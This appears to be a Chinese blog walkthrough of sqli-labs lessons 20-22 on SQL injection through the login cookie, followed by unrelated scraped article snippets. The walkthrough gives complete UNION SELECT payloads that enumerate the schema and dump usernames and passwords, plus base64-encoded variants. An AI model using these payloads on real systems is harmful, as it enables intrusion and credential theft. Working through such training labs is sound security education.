less 20 21 22

less20

输入用户名和密码之后 显示 很多信息 其中有一个cookie值,作为下次登陆的凭证

cookie  比如 登录QQ空间 登录一次过后,可以不使用用户名和密码 就可以登录账号

$sql=“SELECT * FROM users WHERE username=‘$cookee’ LIMIT 0,1”;
在登录之后后台会将username放入cookie中,

再次登录的时候,只要是cookie没有过期,就会去cookie里面取值,然后进行查询。

登录成功之后  刷新一下 再抓包

改cookie:uname=admin‘,报错,说明存在注入漏洞

查看列数:uname=‘ order by 4 # (注意闭合sql语句)

然后猜3列 正确

判断回显位置:uname=‘union select 1,2,3#

爆库 uname=‘union select 1,2,group_concat(schema_name)from information_schema.schemata#

爆表:uname=‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘security‘#

爆列:uname=‘union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘users‘#

爆字段:uname=‘union select 1,2,group_concat(concat_ws(‘-‘,username,password))from security.users#

less21

更新了之后 抓包

可以看到cookie的内容变成加密的形式,百度后用base64加解密可以解决: https://base64.us

把我们需要输入的语句先进行一遍base64加密即可:

例如判断当前数据库:uname=‘)union select 1,2,database()#转义之后:

除了闭合方式和加一步转码外,步骤与上一关完全一致,不再赘述。

less-22

本关抓包并测试发现数据格式变为“”,其他完全一样

“ union select 1,2,database()#转义:IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj

其他一致

原文地址:https://www.cnblogs.com/xingyuner/p/12236630.html

时间: 2024-11-13 05:41:10

less 20 21 22的相关文章

20.20 告警系统主脚本;20.21 告警系统配置文件;20.22 告警系统监控项目

1. 要求:我们的机器角色多种多样,但是所有机器上都要部署同样的监控系统,也就说所有机器不管什么角色,整个程序框架都是一致的,不同的地方在于根据不同的角色,定制不同的配置文件. 2. 程序架构: bin下是:主程序 conf下是:配置文件 shares下是:各个监控脚本 mail下是:邮件引擎 log下是:日志 20.20 告警系统主脚本 约定:所有脚本都放在 /usr/local/bin目录下! shell项目-告警系统main.sh 1. 在/usr/local/bin/目录下,创建一个mo

String转jsonarry:字符串:[{"result":"20"},{"result":"21"},{"result":"20"},{"result":"22"}]

List<HashMap<String, Object>> grididmap = new ArrayList<HashMap<String,Object>>(); String a = bs.toString();   //bs的字符串为如下形式:[{"result":"20"},{"result":"21"},{"result":"20"

20.20 告警系统主脚本20.21 告警系统配置文件20.22 告警系统告警系统监控项目

20.20 告警系统主脚本以后约定所有的shell脚本都放到这个目录下cd /usr/local/sbin创建以下目录主脚本放到bin下vi main.sh 写入以下内容:#!/bin/bash#Written by aming. 是否发送邮件的开关 export send=1 过滤ip地址 export addr=/sbin/ifconfig |grep -A1 "ens33: "|awk '/inet/ {print $2}'dir=pwd 只需要最后一级目录名(这里是最后一级目录

Python 20.21. cookielib模块翻译

Python 20.21.用于http客户端的处理的模块 By 白熊花田(http://blog.csdn.net/whiterbear) 转载请注明出处,谢谢. 原文链接:https://docs.python.org/2/library/cookielib.html 标注: cookielib模块已经在python3中改名为http.cookiejar了.2to3这个工具能够自动地在你将代码由python2.x转为python3.x帮你更正源码. 简介: cookielib模块中定义了几个处

2014年01月16,19,20,21,22,24日

JDK:java开发工具包 JRE:java运行环境 java毕向东 1~4日:path(exe路径);classpath(class运行文件路径) java内存分5区:栈(存变量:变量生命周期完自动释放).堆(存实例:未被引用的实例被垃圾回收).方法区.本地方法区.寄存器. 5~6日:javadoc -d myjavadoc -version -author XXXX.java this关键字:this即实例 7~8日:final关键字,抽象类(强制实例化,继承),接口(implement实现

20.20 告警系统主脚本 20.21 告警系统配置文件 20.22 告警系统监控项目

原文地址:https://www.cnblogs.com/sisul/p/8921743.html

2.18-2.20特殊权限set_uid/set_gid/stick_bit;20.21/2软硬链接

2.18 特殊权限set_uid set_uid作用:普通用户,临时拥有:该命令所有者(用户)身份. 给一个命令,设置set_uid,前提:这个文件必须是一个可执行的二进制文件. 1. 切换到普通用户下:su - 普通用户 [[email protected] ~]# su - haojiabin 2. 查看当前登录用户:whoami [[email protected] ~]$ whoami 3. 在普通用户下,使用ls命令查看root用户下内容: [[email protected] ~]$

ftp的20 21端口和主动被动模式

ftp只支持tcp连接,不支持udp连接. ftp使用两个端口: 21(控制端口, 命令端口) , 20(数据端口) 21端口:  用来控制用户验证, 连接的建立和关闭:open/close/bye 20端口: 用来传输数据. 两个连接: 命令连接(控制连接) , 数据连接 ftp协议使用的端口是21(也称为控制端 口),其实还有一个数据端口20,根据FTP工作方式的不同,数据端口也不都是20,主动模式的被动模式使用的数据端口是不一样的. 主动和被动是相对于谁而言的? ****** 该是相对于f

20/32/22/856/301/921 Parentheses 括号匹配或者生成题

20. https://leetcode.com/problems/valid-parentheses/description/ 32. https://leetcode.com/problems/longest-valid-parentheses/description/ 22. https://leetcode.com/problems/generate-parentheses/description/ 856. https://leetcode.com/problems/score-of-